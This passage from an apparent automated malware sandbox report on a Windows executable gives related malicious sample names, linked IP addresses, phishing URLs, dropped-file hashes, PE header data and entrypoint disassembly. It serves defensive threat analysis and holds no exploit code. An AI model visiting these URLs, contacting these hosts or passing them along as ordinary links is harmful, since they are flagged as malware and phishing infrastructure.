                                                                            • 119.59.121.95
                                                                            2skSjKc71E.docGet hashmaliciousBrowse
                                                                            • 119.59.121.95
                                                                            SIMPLYTRANSITGBpkmo.exeGet hashmaliciousBrowse
                                                                            • 94.76.218.18
                                                                            tS9P6wPz9x.exeGet hashmaliciousBrowse
                                                                            • 85.234.145.174
                                                                            ransomware.exeGet hashmaliciousBrowse
                                                                            • 85.234.145.174
                                                                            ransomware.exeGet hashmaliciousBrowse
                                                                            • 85.234.145.174
                                                                            New Purchase Order NoI-701-PDF.exeGet hashmaliciousBrowse
                                                                            • 151.236.56.175
                                                                            rib.exeGet hashmaliciousBrowse
                                                                            • 185.17.252.199
                                                                            malware1.exeGet hashmaliciousBrowse
                                                                            • 94.76.218.18
                                                                            vrhiyc.exeGet hashmaliciousBrowse
                                                                            • 92.48.84.109
                                                                            ucrcdh.exeGet hashmaliciousBrowse
                                                                            • 92.48.84.109
                                                                            lrbwh.exeGet hashmaliciousBrowse
                                                                            • 92.48.84.109
                                                                            http://www.spginecologia.pt/Get hashmaliciousBrowse
                                                                            • 213.229.91.13
                                                                            https://fax-dfc26d.webflow.io/Get hashmaliciousBrowse
                                                                            • 213.229.66.214
                                                                            zG8cVHvxat.exeGet hashmaliciousBrowse
                                                                            • 94.76.218.18
                                                                            IwYu6X7Hv0.exeGet hashmaliciousBrowse
                                                                            • 85.234.143.94
                                                                            http://www.cnctrainingcentre.comGet hashmaliciousBrowse
                                                                            • 185.17.252.200
                                                                            https://owaadimss.000webhostapp.com/Service-dassistance-informatique.htmGet hashmaliciousBrowse
                                                                            • 213.229.74.253
                                                                            http://read.emailr.com/click.aspx?uid=928c4914-4761-4ea1-9446-52176f395940&fw=https%3A%2F%2Fpiantumazioneselvaggia.it%2Fwp-content%2FAp3dX.html#daniel.keelan@windstream.comGet hashmaliciousBrowse
                                                                            • 151.236.34.168
                                                                            http://www.rcmf.co.ukGet hashmaliciousBrowse
                                                                            • 85.234.143.94
                                                                            _093924.exeGet hashmaliciousBrowse
                                                                            • 94.76.247.61
                                                                            _093926.exeGet hashmaliciousBrowse
                                                                            • 94.76.247.61

                                                                            JA3 Fingerprints

                                                                            No context

                                                                            Dropped Files

                                                                            No context

                                                                            Created / dropped Files

                                                                            C:\ProgramData\Microsoft\Crypto\RSA\S-1-5-18\1942f959aae25ff5e177f0a0e912022f_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                                                                            Process:C:\Windows\SysWOW64\corsangle.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):57
                                                                            Entropy (8bit):2.062967662624547
                                                                            Encrypted:false
                                                                            SSDEEP:3:/lEltfgnwT:yvT
                                                                            MD5:B5D2B9D74D52DAC47A3F3CB1D065305F
                                                                            SHA1:41A4742BC23F3A6FF61C60884604DA6448FFF274
                                                                            SHA-256:6359A4FCB0DABE70B88913A6A03CC21385459B8A924A6B3688A2E185C54DAAFA
                                                                            SHA-512:01EA77C5972D33494C10D6ADB47CB3F30EAC1AA4B93D6BAAFB75299AA99FED818A6275801BAAE92C18AC5D3C64443BB631A63C2B39B1B88BCD774218BB2B990F
                                                                            Malicious:false
                                                                            Preview: ........................................computer$.
                                                                            C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):4096
                                                                            Entropy (8bit):0.5995382577512959
                                                                            Encrypted:false
                                                                            SSDEEP:6:baPMk1GaD0JOCEfMuaaD0JOCEfMKQmDWpr+1Al/gz2cE0fMbhEZolrRSQ2hyYIIT:bGGaD0JcaaD0JwQQo6Ag/0bjSQJ
                                                                            MD5:EE33D31FF892664207CCEE077BC0DA79
                                                                            SHA1:76344E225B25AA8FE2584E88573AC064F16ED9A0
                                                                            SHA-256:42847F4E3B3FAD67FF583317573DADB548FCD5BDDDABF52BA48C055B4808CA60
                                                                            SHA-512:9ABFDF71D25B1A0F89C3DC83ACE301723D4204297A30313667E1E2D96CC59283EA43FE1B949D53A54E4DD57ACCB6EA0D4A134620E242504B1CB6E853D870BD81
                                                                            Malicious:false
                                                                            Preview: ....E..h..(......2...y{.............. ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................2...y{...........&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0xed946bec, page size 16384, DirtyShutdown, Windows version 10.0
                                                                            Category:dropped
                                                                            Size (bytes):32768
                                                                            Entropy (8bit):0.09633512358928906
                                                                            Encrypted:false
                                                                            SSDEEP:12:MV0+w1O4blvctVuvUKqV0+w1O4blvctVuvUK:M2Wgi2Wg
                                                                            MD5:72C62EED75E947FD4F5C02C8754C617F
                                                                            SHA1:3A219E17B34703056103C80AE4DF358CB9FD901F
                                                                            SHA-256:BFAFB13DB37CC356454D9D2FCA9C47D16B4B41A99B327FD7750AA25C320AEC90
                                                                            SHA-512:B6EF780DBEBDAE9C249D49A38A3E32CA6C0CA7789D025DBB54402CF36C80F9475E1FEB41E6A4C7033F2C9643422B8D6097156A741DEE070741E75D125FE391EA
                                                                            Malicious:false
                                                                            Preview: .k.... ................e.f.3...w........................&..........w...2...y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w.........................................................................................................................................................................................................................................(.2...y.k.................AB}.2...y..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):8192
                                                                            Entropy (8bit):0.11227145912104357
                                                                            Encrypted:false
                                                                            SSDEEP:3:zW/l7Ev0XwxXl/bJdAtil0XofO/All:zGli0Et4Y0XofO/A
                                                                            MD5:299061F0C8B90EF6008852D1A202C96C
                                                                            SHA1:06FF5DEA569AAB763896569B61080DFAEB9A391C
                                                                            SHA-256:83C03C421693C7747E6B4BB7E26DFE7C7711B5B89759F9754769F5CAD1181795
                                                                            SHA-512:AB0A509CEBAB9369A63A0E0303608444ABC60F96091DE0011EE296B93A65F0956C8D58D1C06C523FBCF64787A666AC0138E74775E1B310420896245268064DDF
                                                                            Malicious:false
                                                                            Preview: ..4......................................3...w...2...y.......w...............w.......w....:O.....w...................AB}.2...y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):0.10977056583082812
                                                                            Encrypted:false
                                                                            SSDEEP:12:26LVXm/Ey6q9995GjSq3qQ10nMCldimE8eawHjc59d:26L4l68uLyMCldzE9BHjc59d
                                                                            MD5:356ED824D17C6734D7692DEB0C729C6D
                                                                            SHA1:BEED0339DA6E4BE12FE5F660F699FE4DB84B9B46
                                                                            SHA-256:A1EBD349905CBCBB8FF3CE369627B426E504B2ED557FE9BF394781EF6361F6D6
                                                                            SHA-512:47BA2CBCD1F0FD13716FA186931A4B81DAAAEB79B9570A4F37AF326A42541F7B7F0153F32A9CAE6E57FA8B92CF82A996DF215D31A1112BC1A5DEA3A1E9D7E049
                                                                            Malicious:false
                                                                            Preview: ................................................................................(...t....Z.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................M.10..... .........+..........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.(...t....b......................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):0.11234195729199309
                                                                            Encrypted:false
                                                                            SSDEEP:12:OXm/Ey6q9995Gjt1miM3qQ10nMCldimE8eawHza1miItY:bl68Q1tMLyMCldzE9BHza1tIS
                                                                            MD5:16F7720BEA0C5A0F5A1752B8987B6389
                                                                            SHA1:DDD97BD847C44ABF2EEE27CDB19480125E14CE9D
                                                                            SHA-256:BB22FE8174EAC43C8E3712AABB3387AA61221F9D289677C1D7E848C31FF30BFF
                                                                            SHA-512:4F754837AC5CAF17F52F6F942D9E6D4F86EEE965E7DB5F2E5B1C06E780F587AE5EFC685C1C9116AABD0A136F333430E147A220E1295B50526C4CBA23BB566A1D
                                                                            Malicious:false
                                                                            Preview: ................................................................................(...t....A.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................M.10..... ......e...+..........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.(...t....d......................................................................................................................................................................................................................................................................................................................................................................................
                                                                            C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):0.1122591146794691
                                                                            Encrypted:false
                                                                            SSDEEP:12:EXm/Ey6q9995GjZkL1mK2P3qQ10nMCldimE8eawHza1mKyn:Nl68X1iPLyMCldzE9BHza1U
                                                                            MD5:92A832C33E993A27A4642B0CB90C9278
                                                                            SHA1:6CCE3DFD7A34E4054902A2A6759CDE3055F6D7F5
                                                                            SHA-256:EF5A296E6A22D5D7A829EA10D7F17BA4DC1543633C1F4786A89417B5A659106B
                                                                            SHA-512:C7459280897D1A6CA910DF865BAA8804FBB3262E6DF9FFBA6D6BD89081EE1BDAD6D8402C0422E5090799BB4385E0C18333E059317BD5073F20D74FB28A742F55
                                                                            Malicious:false
                                                                            Preview: ................................................................................(...t....\.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................M.10..... ......>...+..........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.(...t...Rl......................................................................................................................................................................................................................................................................................................................................................................................
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                                                                            Process:C:\Users\user\Desktop\lK8vF3n2e7.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):46
                                                                            Entropy (8bit):1.0424600748477153
                                                                            Encrypted:false
                                                                            SSDEEP:3:/lbON:u
                                                                            MD5:89CA7E02D8B79ED50986F098D5686EC9
                                                                            SHA1:A602E0D4398F00C827BFCF711066E67718CA1377
                                                                            SHA-256:30AC626CBD4A97DB480A0379F6D2540195F594C967B7087A26566E352F24C794
                                                                            SHA-512:C5F453E32C0297E51BE43F84A7E63302E7D1E471FADF8BB789C22A4D6E03712D26E2B039D6FBDBD9EBD35C4E93EC27F03684A7BBB67C4FADCCE9F6279417B5DE
                                                                            Malicious:false
                                                                            Preview: ........................................user.
                                                                            C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):55
                                                                            Entropy (8bit):4.306461250274409
                                                                            Encrypted:false
                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                            Malicious:false
                                                                            Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                            C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
                                                                            Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                            File Type:data
                                                                            Category:modified
                                                                            Size (bytes):906
                                                                            Entropy (8bit):3.1539991825586835
                                                                            Encrypted:false
                                                                            SSDEEP:12:58KRBubdpkoF1AG3rlsrfuKRk9+MlWlLehB4yAq7ejCEsrfuPO:OaqdmuF3rlp+kWReH4yJ7MNVO
                                                                            MD5:CE4B18BBA8B894A0D4C6EE141395DAC7
                                                                            SHA1:7B2C06A4E267DBCB28514DB6859A08BF8F7F2952
                                                                            SHA-256:0A5B1FDCB57000156122272E9F8514F8D2A6D691CEECABA3C9938820A44B4133
                                                                            SHA-512:261D967E11487B08B309282BA2E3697810E2A7A84F5D77D0BD03D5FD9211A37C7F030E068ED0CF7F6AEEBE3DA26CBFD403BC52BB15D12665E6A57A31CDD1686A
                                                                            Malicious:false
                                                                            Preview: ........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. W.e.d. .. A.p.r. .. 0.7. .. 2.0.2.1. .0.6.:.5.1.:.3.2.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. W.e.d. .. A.p.r. .. 0.7. .. 2.0.2.1. .0.6.:.5.1.:.3.3.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Entropy (8bit):6.555351362517709
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:lK8vF3n2e7.exe
                                                                            File size:397714
                                                                            MD5:d7cd602eb9e9ad8272d4ad0910815835
                                                                            SHA1:cefae0fd990a5491e893796ab8ab56fc9edc015b
                                                                            SHA256:bca575b21c8b02010cde26b2bd7b2e8cdc313f135f97363b34f8bf0f389a990b
                                                                            SHA512:2500a694e1690a9f4bd62f83a713a0e47892d12f81bafb49f079a43e7425b65bdc0f420da30cfb002e53c4d15dcb0cf977a59b4a8f343dfc0ddfed25478071d7
                                                                            SSDEEP:6144:7KIHCIcX4WScpdOQRFSFRxc0gmKMBISphOxkTtsHNnL4BjxAtI0pjfK89J:7xCTX4WrhFSF3c8KwJEL4BjCI0xz7
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../...Nh..Nh..Nh.CF7..Nh.:mq..Nh..F5..Nh.CF5..Nh..Ni..Lh..Bg..Nh..B7.WNh..oO..Nh..B..DNh.,E6..Nh..B2..Nh.Rich.Nh.........PE..L..

                                                                            File Icon

                                                                            Icon Hash:f88e693369ed86e8

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x412d5e
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                            DLL Characteristics:
                                                                            Time Stamp:0x5DDEB77A [Wed Nov 27 17:50:50 2019 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:4
                                                                            OS Version Minor:0
                                                                            File Version Major:4
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:4
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:5259dc71126b302fc5049844cd581e18

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            push 00000060h
                                                                            push 0044BC68h
                                                                            call 00007FD634D635EFh
                                                                            mov edi, 00000094h
                                                                            mov eax, edi
                                                                            call 00007FD634D62C9Fh
                                                                            mov dword ptr [ebp-18h], esp
                                                                            mov esi, esp
                                                                            mov dword ptr [esi], edi
                                                                            push esi
                                                                            call dword ptr [004322A0h]
                                                                            mov ecx, dword ptr [esi+10h]
                                                                            mov dword ptr [0045A3F0h], ecx
                                                                            mov eax, dword ptr [esi+04h]
                                                                            mov dword ptr [0045A3FCh], eax
                                                                            mov edx, dword ptr [esi+08h]
                                                                            mov dword ptr [0045A400h], edx
                                                                            mov esi, dword ptr [esi+0Ch]
                                                                            and esi, 00007FFFh
                                                                            mov dword ptr [0045A3F4h], esi
                                                                            cmp ecx, 02h
                                                                            je 00007FD634D637BEh
                                                                            or esi, 00008000h
                                                                            mov dword ptr [0045A3F4h], esi
                                                                            shl eax, 08h
                                                                            add eax, edx
                                                                            mov dword ptr [0045A3F8h], eax
                                                                            xor esi, esi
                                                                            push esi
                                                                            mov edi, dword ptr [00432268h]
                                                                            call edi
                                                                            cmp word ptr [eax], 5A4Dh
                                                                            jne 00007FD634D637D1h
                                                                            mov ecx, dword ptr [eax+3Ch]
                                                                            add ecx, eax
                                                                            cmp dword ptr [ecx], 00004550h
                                                                            jne 00007FD634D637C4h
                                                                            movzx eax, word ptr [ecx+18h]
                                                                            cmp eax, 0000010Bh
                                                                            je 00007FD634D637D1h
                                                                            cmp eax, 0000020Bh
                                                                            je 00007FD634D637B7h
                                                                            mov dword ptr [ebp-1Ch], esi
                                                                            jmp 00007FD634D637D9h
                                                                            cmp dword ptr [ecx+00000084h], 0Eh
                                                                            jbe 00007FD634D637A4h
                                                                            xor eax, eax
                                                                            cmp dword ptr [ecx+000000F8h], esi
                                                                            jmp 00007FD634D637C0h
                                                                            cmp dword ptr [ecx+74h], 0Eh
                                                                            jbe 00007FD634D63794h
                                                                            xor eax, eax
                                                                            cmp dword ptr [ecx+000000E8h], esi
                                                                            setne al
                                                                            mov dword ptr [ebp-1Ch], eax

                                                                            Rich Headers

                                                                            Programming Language:
                                                                            • [RES] VS2003 (.NET) build 3077
                                                                            • [ASM] VS2003 (.NET) build 3077
                                                                            • [C++] VS2003 (.NET) build 3077
                                                                            • [ C ] VS2003 (.NET) build 3077
                                                                            • [LNK] VS2003 (.NET) build 3077

                                                                            Data Directories

                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x537a80xf0.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x5c0000x7d80.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x4e8680x48.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x320000x56c.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x537200x40.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                            Sections

                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x10000x308a80x31000False0.575145487883data6.56819222522IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                            .rdata0x320000x2342c0x24000False0.605360243056data6.07417496341IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .data0x560000x5e940x3000False0.257161458333data3.7389632599IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                            .rsrc0x5c0000x7d800x8000False0.405975341797data4.87336804688IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                            Resources

                                                                            NameRVASizeTypeLanguageCountry
                                                                            RT_CURSOR0x60f200x134dataEnglishUnited States
                                                                            RT_CURSOR0x610580xb4dataEnglishUnited States
                                                                            RT_CURSOR0x611380x134AmigaOS bitmap fontEnglishUnited States
                                                                            RT_CURSOR0x612880x134dataEnglishUnited States
                                                                            RT_CURSOR0x613d80x134dataEnglishUnited States
                                                                            RT_CURSOR0x615280x134dataEnglishUnited States
                                                                            RT_CURSOR0x616780x134dataEnglishUnited States
                                                                            RT_CURSOR0x617c80x134dataEnglishUnited States
                                                                            RT_CURSOR0x619180x134dataEnglishUnited States
                                                                            RT_CURSOR0x61a680x134dataEnglishUnited States
                                                                            RT_CURSOR0x61bb80x134dataEnglishUnited States
                                                                            RT_CURSOR0x61d080x134dataEnglishUnited States
                                                                            RT_CURSOR0x61e580x134AmigaOS bitmap fontEnglishUnited States
                                                                            RT_CURSOR0x61fa80x134dataEnglishUnited States
                                                                            RT_CURSOR0x620f80x134dataEnglishUnited States
                                                                            RT_CURSOR0x622480x134dataEnglishUnited States
                                                                            RT_BITMAP0x624800xb8dataEnglishUnited States
                                                                            RT_BITMAP0x625380x144dataEnglishUnited States
                                                                            RT_ICON0x5d5300x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 2576456089, next used block 7374869ArabicSaudi Arabia
                                                                            RT_ICON0x5d8180x1e8dataArabicSaudi Arabia
                                                                            RT_ICON0x5da000x128GLS_BINARY_LSB_FIRSTArabicSaudi Arabia
                                                                            RT_ICON0x5db280x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 15985900, next used block 16771047ArabicSaudi Arabia
                                                                            RT_ICON0x5e3d00x6c8dataArabicSaudi Arabia
                                                                            RT_ICON0x5ea980x568GLS_BINARY_LSB_FIRSTArabicSaudi Arabia
                                                                            RT_ICON0x5f0000x10a8dataArabicSaudi Arabia
                                                                            RT_ICON0x600a80x988dataArabicSaudi Arabia
                                                                            RT_ICON0x60a300x468GLS_BINARY_LSB_FIRSTArabicSaudi Arabia
                                                                            RT_DIALOG0x5cbe00x5a2dataEnglishUnited States
                                                                            RT_DIALOG0x623980xe8dataEnglishUnited States
                                                                            RT_STRING0x626800x82dataEnglishUnited States
                                                                            RT_STRING0x627080x2adataEnglishUnited States
                                                                            RT_STRING0x627380x192dataEnglishUnited States
                                                                            RT_STRING0x628d00x4e2dataEnglishUnited States
                                                                            RT_STRING0x631480x31adataEnglishUnited States
                                                                            RT_STRING0x62e680x2dcdataEnglishUnited States
                                                                            RT_STRING0x63ca80x8adataEnglishUnited States
                                                                            RT_STRING0x62db80xacdataEnglishUnited States
                                                                            RT_STRING0x63b980xdedataEnglishUnited States
                                                                            RT_STRING0x634680x4c4dataEnglishUnited States
                                                                            RT_STRING0x639300x264dataEnglishUnited States
                                                                            RT_STRING0x63c780x2cdataEnglishUnited States
                                                                            RT_STRING0x63d380x42dataEnglishUnited States
                                                                            RT_GROUP_CURSOR0x611100x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                            RT_GROUP_CURSOR0x619000x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                            RT_GROUP_CURSOR0x612700x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                            RT_GROUP_CURSOR0x617b00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                            RT_GROUP_CURSOR0x616600x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                            RT_GROUP_CURSOR0x61f900x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                            RT_GROUP_CURSOR0x615100x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                            RT_GROUP_CURSOR0x61ba00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                            RT_GROUP_CURSOR0x613c00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                            RT_GROUP_CURSOR0x61a500x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                            RT_GROUP_CURSOR0x61cf00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                            RT_GROUP_CURSOR0x61e400x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                            RT_GROUP_CURSOR0x620e00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                            RT_GROUP_CURSOR0x622300x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                            RT_GROUP_CURSOR0x623800x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                            RT_GROUP_ICON0x60e980x84dataArabicSaudi Arabia
                                                                            RT_VERSION0x5d1880x3a4dataEnglishUnited States

                                                                            Imports

                                                                            DLLImport
